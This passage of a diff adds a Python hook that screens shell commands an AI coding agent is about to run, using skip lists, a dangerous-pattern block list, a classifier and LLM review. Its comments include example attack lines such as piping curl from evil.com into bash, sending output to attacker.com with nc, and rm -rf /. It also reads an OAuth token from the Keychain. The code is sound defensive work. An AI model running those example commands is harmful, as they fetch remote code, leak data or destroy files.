+ if pattern not in history["patterns_detected"]:
896
+ history["patterns_detected"].append(pattern)
897
+
898
+ # Update cumulative risk
899
+ history["cumulative_risk"] = calculate_cumulative_risk(history, risk)
900
+
901
+ # Track files at risk
902
+ affected_paths = extract_affected_paths(command)
903
+ for path in affected_paths:
904
+ if path not in history["files_at_risk"]:
905
+ history["files_at_risk"].append(path)
906
+
907
+ # Keep files_at_risk bounded
908
+ if len(history["files_at_risk"]) > 100:
909
+ history["files_at_risk"] = history["files_at_risk"][-100:]
910
+
911
+ save_command_history(session_id, history)
912
+
913
+
914
+ def save_state(session_id: str, shown_warnings: set):
915
+ """Save the set of shown warning keys."""
916
+ state_file = get_state_file(session_id)
917
+ try:
918
+ os.makedirs(os.path.dirname(state_file), exist_ok=True)
919
+ with open(state_file, 'w') as f:
920
+ json.dump(list(shown_warnings), f)
921
+ except IOError:
922
+ pass
923
+
924
+
925
+ def get_warning_key(command: str) -> str:
926
+ """Generate a unique key for deduplication based on command hash."""
927
+ # MD5 used for cache key only, not security
928
+ cmd_hash = hashlib.md5(command.encode(), usedforsecurity=False).hexdigest()[:12]
929
+ return f"cmd-{cmd_hash}"
930
+
931
+
932
+ def get_cache_file(session_id: str, cmd_hash: str) -> str:
933
+ """Get cache file for Pre/Post hook result sharing.
934
+
935
+ Uses ~/.claude/ instead of /tmp for security - avoids symlink attacks
936
+ and race conditions on shared systems.
937
+ """
938
+ return os.path.expanduser(f"~/.claude/deliberate_cmd_cache_{session_id}_{cmd_hash}.json")
939
+
940
+
941
+ def save_to_cache(session_id: str, cmd_hash: str, data: dict):
942
+ """Save analysis result to cache for PostToolUse to read."""
943
+ cache_file = get_cache_file(session_id, cmd_hash)
944
+ try:
945
+ with open(cache_file, 'w') as f:
946
+ json.dump(data, f)
947
+ debug(f"Cached result to {cache_file}")
948
+ except IOError as e:
949
+ debug(f"Failed to cache: {e}")
950
+
951
+
952
+ def load_blocking_config() -> dict:
953
+ """Load blocking configuration from ~/.deliberate/config.json"""
954
+ try:
955
+ config_path = Path(CONFIG_FILE)
956
+ if config_path.exists():
957
+ with open(config_path, 'r', encoding='utf-8') as f:
958
+ config = json.load(f)
959
+ blocking = config.get("blocking", {})
960
+ return {
961
+ "enabled": blocking.get("enabled", False),
962
+ "confidenceThreshold": blocking.get("confidenceThreshold", 0.85)
963
+ }
964
+ except Exception:
965
+ pass
966
+ return {"enabled": False, "confidenceThreshold": 0.85}
967
+
968
+
969
+ def load_dedup_config() -> bool:
970
+ """Load deduplication config - returns True if dedup is enabled (default)."""
971
+ try:
972
+ config_path = Path(CONFIG_FILE)
973
+ if config_path.exists():
974
+ with open(config_path, 'r', encoding='utf-8') as f:
975
+ config = json.load(f)
976
+ return config.get("deduplication", {}).get("enabled", True)
977
+ except Exception:
978
+ pass
979
+ return True
980
+
981
+
982
+ # Default trivial commands that are TRULY safe - no abuse potential
983
+ # These are skipped entirely (no analysis, no output) for performance
984
+ # SECURITY: Commands that can read sensitive files (cat, head, tail, less, more),
985
+ # leak secrets (env, printenv, echo), or execute commands (command) are NOT included
986
+ DEFAULT_SKIP_COMMANDS = {
987
+ # Directory listing only (cannot read file contents)
988
+ "ls", "ll", "la", "dir", "tree",
989
+ # Current state queries (no sensitive data exposure)
990
+ "pwd", "whoami", "hostname", "date", "uptime", "uname",
991
+ # Binary location queries (safe - just paths)
992
+ "which", "whereis", "type -t", "type -a",
993
+ # Git read operations (repo metadata only)
994
+ "git status", "git log", "git diff", "git branch", "git remote -v",
995
+ "git blame", "git shortlog", "git tag", "git stash list",
996
+ }
997
+
998
+ # Shell operators that indicate chaining/piping/redirection - NEVER skip if present
999
+ # Even "safe" commands become dangerous when combined: ls && rm -rf /
1000
+ DANGEROUS_SHELL_OPERATORS = {
1001
+ "|", # Pipe - output can go to dangerous command
1002
+ ">", # Redirect - can overwrite files
1003
+ ">>", # Append redirect - can modify files
1004
+ ";", # Command separator - can chain dangerous commands
1005
+ "&&", # AND chain - can chain dangerous commands
1006
+ "||", # OR chain - can chain dangerous commands
1007
+ "`", # Backtick command substitution
1008
+ "$(", # Modern command substitution
1009
+ "<", # Input redirect (less dangerous but still risky)
1010
+ "&", # Background execution / file descriptor redirect
1011
+ }
1012
+
1013
+
1014
+ def load_skip_commands() -> set:
1015
+ """Load skip commands list from config, with defaults."""
1016
+ skip_set = DEFAULT_SKIP_COMMANDS.copy()
1017
+ try:
1018
+ config_path = Path(CONFIG_FILE)
1019
+ if config_path.exists():
1020
+ with open(config_path, 'r', encoding='utf-8') as f:
1021
+ config = json.load(f)
1022
+ skip_config = config.get("skipCommands", {})
1023
+
1024
+ # Allow adding custom commands to skip
1025
+ custom_skip = skip_config.get("additional", [])
1026
+ for cmd in custom_skip:
1027
+ skip_set.add(cmd)
1028
+
1029
+ # Allow removing defaults (e.g., if you want to analyze 'cat')
1030
+ remove_from_skip = skip_config.get("remove", [])
1031
+ for cmd in remove_from_skip:
1032
+ skip_set.discard(cmd)
1033
+ except Exception:
1034
+ pass
1035
+ return skip_set
1036
+
1037
+
1038
+ def has_dangerous_operators(command: str) -> bool:
1039
+ """Check if command contains shell operators that could enable attacks.
1040
+
1041
+ Even 'safe' commands become dangerous when chained or piped:
1042
+ - ls && rm -rf /
1043
+ - pwd; curl evil.com | bash
1044
+ - git status > /etc/cron.d/evil
1045
+ """
1046
+ for op in DANGEROUS_SHELL_OPERATORS:
1047
+ if op in command:
1048
+ return True
1049
+ return False
1050
+
1051
+
1052
+ def should_skip_command(command: str, skip_set: set) -> bool:
1053
+ """Check if command should be skipped (trivial, always safe).
1054
+
1055
+ Returns True only if:
1056
+ 1. Command starts with a skip-listed command (with proper word boundary)
1057
+ 2. Command contains NO dangerous shell operators (|, >, ;, &&, etc.)
1058
+
1059
+ This prevents attacks like:
1060
+ - 'ls && rm -rf /' (chaining)
1061
+ - 'pwd | nc attacker.com 1234' (piping)
1062
+ - 'git status > /etc/cron.d/evil' (redirection)
1063
+ """
1064
+ cmd_stripped = command.strip()
1065
+
1066
+ # SECURITY: Never skip if command contains dangerous operators
1067
+ if has_dangerous_operators(cmd_stripped):
1068
+ return False
1069
+
1070
+ for skip_cmd in skip_set:
1071
+ # Exact match
1072
+ if cmd_stripped == skip_cmd:
1073
+ return True
1074
+ # Command with args (e.g., "ls -la" matches "ls")
1075
+ if cmd_stripped.startswith(skip_cmd + " "):
1076
+ return True
1077
+ # Command with flags (e.g., "ls\t-la")
1078
+ if cmd_stripped.startswith(skip_cmd + "\t"):
1079
+ return True
1080
+
1081
+ return False
1082
+
1083
+
1084
+ def get_token_from_keychain():
1085
+ # type: () -> str | None
1086
+ """Get Claude Code OAuth token from macOS Keychain."""
1087
+ try:
1088
+ import subprocess
1089
+ result = subprocess.run(
1090
+ ["/usr/bin/security", "find-generic-password", "-s", "Claude Code-credentials", "-w"],
1091
+ capture_output=True,
1092
+ text=True,
1093
+ timeout=5
1094
+ )
1095
+ if result.returncode != 0:
1096
+ return None
1097
+
1098
+ credentials_json = result.stdout.strip()
1099
+ if not credentials_json:
1100
+ return None
1101
+
1102
+ data = json.loads(credentials_json)
1103
+ token = data.get("claudeAiOauth", {}).get("accessToken")
1104
+
1105
+ if token and token.startswith("sk-ant-oat01-"):
1106
+ return token
1107
+ return None
1108
+ except Exception:
1109
+ return None
1110
+
1111
+
1112
+ def load_llm_config():
1113
+ # type: () -> dict | None
1114
+ """Load LLM configuration from ~/.deliberate/config.json or keychain"""
1115
+ try:
1116
+ config_path = Path(CONFIG_FILE)
1117
+ if config_path.exists():
1118
+ with open(config_path, 'r', encoding='utf-8') as f:
1119
+ config = json.load(f)
1120
+ llm = config.get("llm", {})
1121
+ provider = llm.get("provider")
1122
+ if not provider:
1123
+ return None
1124
+
1125
+ # For claude-subscription, get fresh token from keychain
1126
+ api_key = llm.get("apiKey")
1127
+ if provider == "claude-subscription":
1128
+ keychain_token = get_token_from_keychain()
1129
+ if keychain_token:
1130
+ api_key = keychain_token
1131
+
1132
+ return {
1133
+ "provider": provider,
1134
+ "base_url": llm.get("baseUrl"),
1135
+ "api_key": api_key,
1136
+ "model": llm.get("model")
1137
+ }
1138
+ except Exception as e:
1139
+ debug(f"Error loading config: {e}")
1140
+ return None
1141
+
1142
+ # Commands that are always safe (skip explanation) - fallback if classifier unavailable
1143
+ SAFE_PREFIXES = [
1144
+ "ls", "pwd", "echo", "cat", "head", "tail", "wc", "which", "whoami",
1145
+ "date", "cal", "uptime", "hostname", "uname", "env", "printenv",
1146
+ "cd", "pushd", "popd", "dirs",
1147
+ "git status", "git log", "git diff", "git branch", "git show",
1148
+ "npm list", "npm outdated", "npm --version", "node --version",
1149
+ "python --version", "python3 --version", "pip list", "pip show",
1150
+ "pgrep", "ps aux", "top -l", "htop",
1151
+ ]
1152
+
1153
+ # Patterns that indicate potentially dangerous commands - fallback if classifier unavailable
1154
+ DANGEROUS_PATTERNS = [
1155
+ "rm -rf", "rm -r", "rmdir",
1156
+ "sudo", "su ",
1157
+ "> /dev/", "dd if=",
1158
+ "chmod 777", "chmod -R",
1159
+ "mkfs", "fdisk", "parted",
1160
+ ":(){ :|:& };:", # fork bomb
1161
+ "curl | sh", "curl | bash", "wget | sh", "wget | bash",
1162
+ "DROP ", "DELETE FROM", "TRUNCATE",
1163
+ "kubectl delete", "kubectl exec",
1164
+ "docker rm", "docker rmi", "docker system prune",
1165
+ "aws s3 rm", "aws ec2 terminate",
1166
+ "terraform destroy",
1167
+ "systemctl stop", "systemctl disable",
1168
+ "kill -9", "killall", "pkill",
1169
+ ]
1170
+
1171
+
1172
+ def debug(msg):
1173
+ if DEBUG:
1174
+ print(f"[deliberate-cmd] {msg}", file=sys.stderr)
1175
+
1176
+
1177
+ def is_safe_command(command: str) -> bool:
1178
+ """Check if command is in the safe list (fallback)."""
1179
+ cmd_lower = command.strip().lower()
1180
+ for prefix in SAFE_PREFIXES:
1181
+ if cmd_lower.startswith(prefix.lower()):
1182
+ return True
1183
+ return False
1184
+
1185
+
1186
+ def is_dangerous_command(command: str) -> bool:
1187
+ """Check if command matches dangerous patterns (fallback)."""
1188
+ cmd_lower = command.lower()
1189
+ for pattern in DANGEROUS_PATTERNS:
1190
+ if pattern.lower() in cmd_lower:
1191
+ return True
1192
+ return False
1193
+
1194
+
1195
+ def call_classifier(command: str) -> dict | None:
1196
+ """Call the classifier server for pattern + ML based classification."""
1197
+ if not USE_CLASSIFIER:
1198
+ return None
1199
+
1200
+ request_body = json.dumps({"command": command}).encode('utf-8')
1201
+
1202
+ try:
1203
+ req = urllib.request.Request(
1204
+ CLASSIFIER_URL,
1205
+ data=request_body,
1206
+ headers={"Content-Type": "application/json"},
1207
+ method="POST"
1208
+ )
1209
+
1210
+ with urllib.request.urlopen(req, timeout=CLASSIFIER_TIMEOUT) as response: # nosec B310
1211
+ result = json.loads(response.read().decode('utf-8'))
1212
+ debug(f"Classifier result: {result}")
1213
+ return result
1214
+
1215
+ except urllib.error.URLError as e:
1216
+ debug(f"Classifier unavailable: {e}")
1217
+ return None
1218
+ except Exception as e:
1219
+ debug(f"Classifier error: {e}")
1220
+ return None
1221
+
1222
+
1223
+ def extract_script_content(command: str) -> str | None:
1224
+ """Extract content of script files being executed.
1225
+
1226
+ Detects patterns like:
1227
+ - bash /path/to/script.sh
1228
+ - sh script.sh
1229
+ - ./script.sh
1230
+ - source script.sh
1231
+ - python script.py
1232
+ """
1233
+ import re
1234
+
1235
+ # Common script execution patterns
1236
+ patterns = [
1237
+ # bash/sh/zsh execution
1238
+ r'^(?:sudo\s+)?(?:bash|sh|zsh|ksh)\s+(?:-[a-zA-Z]*\s+)*([^\s|;&]+)',
1239
+ # Direct script execution (./script or /path/script)
1240
+ r'^(?:sudo\s+)?(\./[^\s|;&]+|/[^\s|;&]+\.(?:sh|bash|py|pl|rb|js))',
1241
+ # source or dot command
1242
+ r'^(?:source|\.)\s+([^\s|;&]+)',
1243
+ # Python execution
1244
+ r'^(?:sudo\s+)?python[23]?\s+(?:-[a-zA-Z]*\s+)*([^\s|;&]+\.py)',
1245
+ # Node execution
1246
+ r'^(?:sudo\s+)?node\s+(?:-[a-zA-Z]*\s+)*([^\s|;&]+\.js)',
1247
+ ]
1248
+
1249
+ for pattern in patterns:
1250
+ match = re.search(pattern, command.strip())
1251
+ if match:
1252
+ script_path = match.group(1)
1253
+ script_path = os.path.expanduser(script_path)
1254
+
1255
+ if os.path.isfile(script_path):
1256
+ try:
1257
+ with open(script_path, 'r', encoding='utf-8', errors='ignore') as f:
1258
+ content = f.read(10000) # Limit to 10KB
1259
+ debug(f"Read script content from: {script_path} ({len(content)} chars)")
1260
+ return content
1261
+ except (IOError, PermissionError) as e:
1262
+ debug(f"Could not read script: {e}")
1263
+ return None
1264
+ else:
1265
+ debug(f"Script file not found: {script_path}")
1266
+ return None
1267
+
1268
+ return None
1269
+
1270
+
1271
+ def extract_inline_content(command: str) -> str | None:
1272
+ """Extract inline content from heredocs and redirects.
1273
+
1274
+ Detects patterns like:
1275
+ - cat > file << EOF ... EOF
1276
+ - cat > file << 'EOF' ... EOF
1277
+ - echo "content" > file
1278
+ - printf 'content' > file
1279
+
1280
+ Returns the inline content if found, None otherwise.
1281
+ """
1282
+ import re
1283
+
1284
+ # Heredoc patterns - capture content between << MARKER and MARKER
1285
+ # Handles both << EOF and << 'EOF' (quoted prevents variable expansion)
1286
+ heredoc_pattern = r'<<\s*[\'"]?(\w+)[\'"]?\s*\n(.*?)\n\1'
1287
+ heredoc_match = re.search(heredoc_pattern, command, re.DOTALL)
1288
+ if heredoc_match:
1289
+ content = heredoc_match.group(2)
1290
+ debug(f"Extracted heredoc content ({len(content)} chars)")
1291
+ return content
1292
+
1293
+ # Echo redirect patterns - echo "..." > file or echo '...' > file
1294
+ # Capture the content being echoed
1295
+ echo_patterns = [
1296
+ # echo "content" > file
1297
+ r'echo\s+"([^"]+)"\s*>+\s*\S+',
1298
+ # echo 'content' > file
1299
+ r"echo\s+'([^']+)'\s*>+\s*\S+",
1300
+ # echo $'content' > file (bash ANSI-C quoting)
1301
+ r"echo\s+\$'([^']+)'\s*>+\s*\S+",
1302
+ # echo content > file (unquoted, single word)
1303
+ r'echo\s+([^\s>|;&]+)\s*>+\s*\S+',
1304
+ ]
1305
+
1306
+ for pattern in echo_patterns:
1307
+ match = re.search(pattern, command)
1308
+ if match:
1309
+ content = match.group(1)
1310
+ # Unescape common sequences
1311
+ content = content.replace('\\n', '\n').replace('\\t', '\t')
1312
+ debug(f"Extracted echo content ({len(content)} chars)")
1313
+ return content
1314
+
1315
+ # Printf redirect patterns - printf 'format' > file
1316
+ printf_patterns = [
1317
+ # printf "content" > file
1318
+ r'printf\s+"([^"]+)"\s*>+\s*\S+',
1319
+ # printf 'content' > file
1320
+ r"printf\s+'([^']+)'\s*>+\s*\S+",
1321
+ ]
1322
+
1323
+ for pattern in printf_patterns:
1324
+ match = re.search(pattern, command)
1325
+ if match:
1326
+ content = match.group(1)
1327
+ # Unescape common sequences
1328
+ content = content.replace('\\n', '\n').replace('\\t', '\t')
1329
+ debug(f"Extracted printf content ({len(content)} chars)")
1330
+ return content
1331
+
1332
+ return None
1333
+
1334
+
1335
+ def call_llm_for_explanation(command: str, pre_classification: dict | None = None, script_content: str | None = None) -> dict | None:
1336
+ """Call the configured LLM to explain the command using Claude Agent SDK."""
1337
+
1338
+ llm_config = load_llm_config()
1339
+ if not llm_config:
1340
+ debug("No LLM configured")
1341
+ return None
1342
+
1343
+ provider = llm_config["provider"]
1344
+
1345
+ # Only use SDK for claude-subscription provider
1346
+ if provider != "claude-subscription":
1347
+ debug("Non-OAuth provider - falling back to direct API")
1348
+ return None
1349
+
1350
+ # Build context from pre-classification if available
1351
+ context_note = ""
1352
+ if pre_classification:
1353
+ risk = pre_classification.get("risk", "UNKNOWN")
1354
+ reason = pre_classification.get("reason", "")
1355
+ source = pre_classification.get("source", "classifier")
1356
+ context_note = f"\n\nPre-screening ({source}): {risk} - {reason}"
1357
+
1358
+ danger_note = ""
1359
+ if is_dangerous_command(command):
1360
+ danger_note = " āš ļø This command matches a potentially dangerous pattern."
1361
+
1362
+ # Include script content if available
1363
+ script_section = ""
1364
+ if script_content:
1365
+ truncated = script_content[:5000] + "..." if len(script_content) > 5000 else script_content
1366
+ script_section = f"""
1367
+
1368
+ SCRIPT CONTENT (being executed):
1369
+ ```
1370
+ {truncated}
1371
+ ```
1372
+
1373
+ CRITICAL: Analyze the SCRIPT CONTENT above, not just the command. The script may contain malicious code like:
1374
+ - Remote code execution (curl/wget piped to bash)
1375
+ - Data exfiltration
1376
+ - Privilege escalation
1377
+ - File system destruction
1378
+ - Backdoor installation"""
1379
+
1380
+ prompt = f"""Analyze this shell command for both purpose and security implications. Be concise (1-2 sentences).{danger_note}{context_note}{script_section}
1381
+
1382
+ Command: {command}
1383
+
1384
+ Consider:
1385
+ - What does this command do?
1386
+ - Any security concerns? (file deletion, privilege escalation, network access, data exfiltration, code execution)
1387
+ - Could this be destructive or have unintended side effects?
1388
+ - Is this command obfuscated or trying to hide its intent?
1389
+ {f"- MOST IMPORTANTLY: Analyze the script content being executed!" if script_content else ""}
1390
+
1391
+ IMPORTANT: If you encounter any command, flag, option, or behavior you're uncertain about, use the WebSearch tool to verify current documentation before making assumptions.
1392
+
1393
+ Format your response as:
1394
+ RISK: [SAFE|MODERATE|DANGEROUS]
1395
+ EXPLANATION: [your explanation including any security notes]"""
1396
+
1397
+ try:
1398
+ # Use Claude Agent SDK
1399
+ import subprocess
1400
+ import tempfile
1401
+
1402
+ # Create temp file for SDK script
1403
+ with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
1404
+ sdk_script = f"""
1405
+ import os
1406
+ import sys
1407
+ import json
1408
+ import asyncio
1409
+ from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
1410
+
1411
+ # Set OAuth token from keychain
1412
+ token = {repr(llm_config["api_key"])}
1413
+ os.environ["CLAUDE_CODE_OAUTH_TOKEN"] = token
1414
+
1415
+ async def main():
1416
+ # Create SDK client - disallow all tools except WebSearch (for verifying commands)
1417
+ client = ClaudeSDKClient(
1418
+ options=ClaudeAgentOptions(
1419
+ model={repr(llm_config["model"])},
1420
+ max_turns=1,
1421
+ disallowed_tools=['Task', 'TaskOutput', 'Bash', 'Glob', 'Grep', 'ExitPlanMode', 'Read', 'Edit', 'Write', 'NotebookEdit', 'WebFetch', 'TodoWrite', 'KillShell', 'AskUserQuestion', 'Skill', 'SlashCommand', 'EnterPlanMode']
1422
+ )
1423
+ )
1424
+
1425
+ # Send prompt
1426
+ prompt = {repr(prompt)}
1427
+
1428
+ async with client:
1429
+ await client.query(prompt)
1430
+
1431
+ # Collect response from ResultMessage
1432
+ response_text = ""
1433
+ async for msg in client.receive_response():
1434
+ msg_type = type(msg).__name__
1435
+ if msg_type == 'ResultMessage' and hasattr(msg, 'result'):
1436
+ response_text = msg.result
1437
+ break
1438
+
1439
+ print(response_text)
1440
+
1441
+ # Run async main
1442
+ asyncio.run(main())
1443
+ """
1444
+ f.write(sdk_script)
1445
+ script_path = f.name
1446
+
1447
+ # Run SDK script
1448
+ result = subprocess.run(
1449
+ ["python3", script_path],
1450
+ capture_output=True,
1451
+ text=True,
1452
+ timeout=TIMEOUT_SECONDS
1453
+ )
1454
+
1455
+ os.unlink(script_path)
1456
+
1457
+ if result.returncode != 0:
1458
+ debug(f"SDK script failed: {result.stderr}")
1459
+ return None
1460
+
1461
+ content = result.stdout.strip()
1462
+
1463
+ # Parse the response
1464
+ risk = "MODERATE"
1465
+ explanation = content
1466
+
1467
+ if "RISK:" in content and "EXPLANATION:" in content:
1468
+ parts = content.split("EXPLANATION:")
1469
+ risk_line = parts[0]
1470
+ explanation = parts[1].strip() if len(parts) > 1 else content
1471
+
1472
+ if "DANGEROUS" in risk_line:
1473
+ risk = "DANGEROUS"
1474
+ elif "SAFE" in risk_line:
1475
+ risk = "SAFE"
1476
+
1477
+ return {"risk": risk, "explanation": explanation}
1478
+
1479
+ except Exception as e:
1480
+ debug(f"SDK error: {e}")
1481
+ return None
1482
+
1483
+
1484
+ def main():
1485
+ debug("Hook started")
1486
+
1487
+ # Periodically clean up old state files
1488
+ cleanup_old_state_files()
1489
+
1490
+ try:
1491
+ input_data = json.load(sys.stdin)
1492
+ debug(f"Got input: tool={input_data.get('tool_name')}")
1493
+ except json.JSONDecodeError as e:
1494
+ debug(f"JSON decode error: {e}")
1495
+ sys.exit(0)
1496
+
1497
+ # Extract session ID for deduplication
1498
+ session_id = input_data.get("session_id", "default")
1499
+ tool_name = input_data.get("tool_name", "")
1500
+ tool_input = input_data.get("tool_input", {})
1501
+
1502
+ # Only process Bash commands
1503
+ if tool_name != "Bash":
1504
+ debug("Not a Bash command, skipping")
1505
+ sys.exit(0)
1506
+
1507
+ command = tool_input.get("command", "")
1508
+ if not command:
1509
+ debug("No command, skipping")
1510
+ sys.exit(0)
1511
+
1512
+ # Check if command should be skipped (trivial, always-safe commands)
1513
+ skip_commands = load_skip_commands()
1514
+ if should_skip_command(command, skip_commands):
1515
+ debug(f"Skipping trivial command: {command[:50]}")
1516
+ sys.exit(0)
1517
+
1518
+ # Check command history for workflow patterns BEFORE individual analysis
1519
+ # Uses sliding window (default 3 commands) to avoid stale pattern matches
1520
+ history = load_command_history(session_id)
1521
+ workflow_patterns = detect_workflow_patterns(history, command)
1522
+
1523
+ # Check for destruction consequences
1524
+ cwd = input_data.get("cwd", os.getcwd())
1525
+ destruction_consequences = get_destruction_consequences(command, cwd)
1526
+
1527
+ # If we detect a dangerous workflow pattern, escalate immediately
1528
+ workflow_warning = ""
1529
+ workflow_risk_escalation = None # Track if we need to escalate risk due to workflow
1530
+ if workflow_patterns:
1531
+ for pattern_name, pattern_risk, pattern_desc in workflow_patterns:
1532
+ workflow_warning += f"\n\nāš ļø WORKFLOW PATTERN DETECTED: {pattern_name} [{pattern_risk}]\n"
1533
+ workflow_warning += f" {pattern_desc}\n"
1534
+ workflow_warning += f" Session commands: {len(history['commands'])} | Cumulative risk: {history['cumulative_risk']}"
1535
+
1536
+ # Track highest workflow risk for potential escalation
1537
+ if workflow_risk_escalation is None or pattern_risk == "CRITICAL":
1538
+ workflow_risk_escalation = pattern_risk
1539
+
1540
+ # Show files at risk if we have them
1541
+ if history.get("files_at_risk"):
1542
+ files_preview = history["files_at_risk"][:5]
1543
+ workflow_warning += f"\n Files at risk: {', '.join(files_preview)}"
1544
+ if len(history["files_at_risk"]) > 5:
1545
+ workflow_warning += f" (+{len(history['files_at_risk']) - 5} more)"
1546
+
1547
+ # Build destruction warning from consequences (already computed above)
1548
+ destruction_warning = ""
1549
+ if destruction_consequences and destruction_consequences.get("warning"):
1550
+ destruction_warning = f"\n\n{destruction_consequences['warning']}"
1551
+
1552
+ # Layer 1: Try classifier server first (pattern + ML) for risk level
1553
+ classifier_result = call_classifier(command)
1554
+
1555
+ # Fallback: Use inline pattern matching if classifier unavailable
1556
+ if not classifier_result:
1557
+ if is_safe_command(command):
1558
+ classifier_result = {"risk": "SAFE", "reason": "Known safe command pattern", "source": "pattern"}
1559
+ elif is_dangerous_command(command):
1560
+ classifier_result = {"risk": "DANGEROUS", "reason": "Known dangerous command pattern", "source": "pattern"}
1561
+ else:
1562
+ classifier_result = None # No pattern match, rely on LLM
1563
+
1564
+ # Extract script content if this is a script execution command
1565
+ script_content = extract_script_content(command)
1566
+ if script_content:
1567
+ debug(f"Detected script execution, read {len(script_content)} chars of script content")
1568
+
1569
+ # Extract inline content if this is a heredoc/echo/printf write command
1570
+ inline_content = extract_inline_content(command)
1571
+ if inline_content:
1572
+ debug(f"Detected inline content write, extracted {len(inline_content)} chars")
1573
+
1574
+ # Use whichever content we found (mutually exclusive in practice)
1575
+ # Script content = executing a file, inline content = writing via heredoc/echo
1576
+ analyzed_content = script_content or inline_content
1577
+ is_inline_write = inline_content is not None
1578
+
1579
+ # Layer 2: Get LLM explanation for detailed analysis
1580
+ debug(f"Analyzing command: {command[:80]}")
1581
+ llm_result = call_llm_for_explanation(command, classifier_result, analyzed_content)
1582
+
1583
+ # Progressive degradation: Use classifier if LLM unavailable
1584
+ llm_unavailable_warning = ""
1585
+ if not llm_result:
1586
+ if classifier_result and classifier_result.get("source") != "fallback":
1587
+ # Classifier worked, use its result even without LLM explanation
1588
+ risk = classifier_result.get("risk", "MODERATE")
1589
+ explanation = classifier_result.get('reason', 'Review command manually')
1590
+ llm_unavailable_warning = "\n\nāš ļø LLM unavailable - using basic pattern matching only.\nTo get detailed explanations, configure: ~/.deliberate/config.json\nOr run: deliberate install"
1591
+ debug("LLM unavailable, using classifier-only result")
1592
+ else:
1593
+ # Both layers failed - exit silently (fail-open)
1594
+ # This prevents blocking user if Deliberate is misconfigured
1595
+ debug("Both classifier and LLM unavailable, allowing command")
1596
+ sys.exit(0)
1597
+ else:
1598
+ # Use classifier risk if available, otherwise use LLM risk
1599
+ if classifier_result:
1600
+ risk = classifier_result.get("risk", llm_result["risk"])
1601
+ else:
1602
+ risk = llm_result["risk"]
1603
+ explanation = llm_result["explanation"]
1604
+
1605
+ # NOTE: Deduplication is handled AFTER block/allow decision
1606
+ # We moved it below to prevent blocked commands from being allowed on retry
1607
+
1608
+ # Cache result for PostToolUse to display (persistent after execution)
1609
+ # This ensures analysis is visible even after PreToolUse prompt disappears
1610
+ # MD5 used for cache key only, not security
1611
+ cmd_hash = hashlib.md5(command.encode(), usedforsecurity=False).hexdigest()[:16]
1612
+ save_to_cache(session_id, cmd_hash, {
1613
+ "risk": risk,
1614
+ "explanation": explanation,
1615
+ "command": command[:200], # Truncate for cache
1616
+ "llm_unavailable_warning": llm_unavailable_warning
1617
+ })
1618
+
1619
+ # Add command to session history for workflow tracking
1620
+ add_command_to_history(session_id, command, risk or "MODERATE", explanation or "")
1621
+
1622
+ # SAFE commands: auto-allow, PostToolUse will show info after execution
1623
+ # UNLESS a workflow pattern was detected - then we still need to warn
1624
+ if risk == "SAFE" and not workflow_patterns:
1625
+ debug(f"Auto-allowing SAFE command, cached for PostToolUse")
1626
+ sys.exit(0)
1627
+
1628
+ # Trigger automatic backup for ANY destructive command (catch-all safety net)
1629
+ backup_config = load_backup_config()
1630
+ backup_path = None
1631
+ if backup_config.get("enabled", True):
1632
+ # Backup if we detected any destruction consequences - this is the catch-all
1633
+ # Regardless of risk level, if files will be deleted, back them up first
1634
+ should_backup = destruction_consequences is not None and (
1635
+ destruction_consequences.get("files") or
1636
+ destruction_consequences.get("dirs")
1637
+ )
1638
+
1639
+ if should_backup:
1640
+ backup_path = create_pre_destruction_backup(
1641
+ session_id, command, cwd,
1642
+ destruction_consequences, history
1643
+ )
1644
+ if backup_path:
1645
+ debug(f"Created pre-destruction backup at: {backup_path}")
1646
+
1647
+ # Auto-block DANGEROUS commands when both classifier AND LLM agree
1648
+ # This catches truly malicious commands like `rm -rf /` or malicious scripts
1649
+ # NOTE: Inline writes (heredocs/echo) only get "ask" - they're writes, not executions
1650
+ if risk == "DANGEROUS" and not is_inline_write:
1651
+ classifier_dangerous = classifier_result and classifier_result.get("risk") == "DANGEROUS"
1652
+ llm_dangerous = llm_result and llm_result.get("risk") == "DANGEROUS"
1653
+
1654
+ # Block if both agree OR if script content was analyzed and found dangerous
1655
+ both_agree = classifier_dangerous and llm_dangerous
1656
+ script_analyzed = script_content is not None and llm_dangerous
1657
+
1658
+ if both_agree or script_analyzed:
1659
+ # Auto-block with exit code 2 - cannot proceed
1660
+ block_message = f"ā›” BLOCKED by Deliberate: {explanation}"
1661
+ print(block_message, file=sys.stderr)
1662
+ debug(f"Auto-blocked DANGEROUS command (classifier={classifier_dangerous}, llm={llm_dangerous}, script={script_content is not None})")
1663
+ sys.exit(2)
1664
+
1665
+ # ANSI color codes for terminal output
1666
+ BOLD = "\033[1m"
1667
+ CYAN = "\033[96m"
1668
+ RED = "\033[91m"
1669
+ YELLOW = "\033[93m"
1670
+ GREEN = "\033[92m"
1671
+ RESET = "\033[0m"
1672
+
1673
+ # Choose emoji and color based on risk for visual branding
1674
+ if risk == "DANGEROUS":
1675
+ emoji = "🚨"
1676
+ color = RED
1677
+ elif risk == "SAFE":
1678
+ emoji = "āœ…"
1679
+ color = GREEN
1680
+ else:
1681
+ emoji = "⚔"
1682
+ color = YELLOW
1683
+
1684
+ # User-facing message with branded formatting and colors
1685
+ # Color the explanation text so it's not easy to skip
1686
+ reason = f"{emoji} {BOLD}{CYAN}DELIBERATE{RESET} {BOLD}{color}[{risk}]{RESET}\n {color}{explanation}{RESET}{llm_unavailable_warning}"
1687
+
1688
+ # Add workflow warning if patterns were detected
1689
+ if workflow_warning:
1690
+ reason += f"\n{RED}{workflow_warning}{RESET}"
1691
+
1692
+ # Add destruction consequences if we have them
1693
+ if destruction_warning:
1694
+ reason += f"\n{RED}{destruction_warning}{RESET}"
1695
+
1696
+ # Add backup notification if we created one
1697
+ backup_notice = ""
1698
+ if backup_path:
1699
+ backup_notice = f"\n\nšŸ’¾ Auto-backup created: {backup_path}"
1700
+ reason += f"\n{GREEN}{backup_notice}{RESET}"
1701
+
1702
+ # For Claude's context (shown in conversation)
1703
+ context = f"**Deliberate** [{risk}]: {explanation}{llm_unavailable_warning}"
1704
+ if workflow_warning:
1705
+ # Strip ANSI codes for Claude's context
1706
+ context += workflow_warning
1707
+ if destruction_warning:
1708
+ context += destruction_warning
1709
+ if backup_notice:
1710
+ context += backup_notice
1711
+
1712
+ # Session deduplication - only for "ask" commands (not blocked ones)
1713
+ # This prevents showing the same warning twice in a session
1714
+ if load_dedup_config():
1715
+ warning_key = get_warning_key(command)
1716
+ shown_warnings = load_state(session_id)
1717
+
1718
+ if warning_key in shown_warnings:
1719
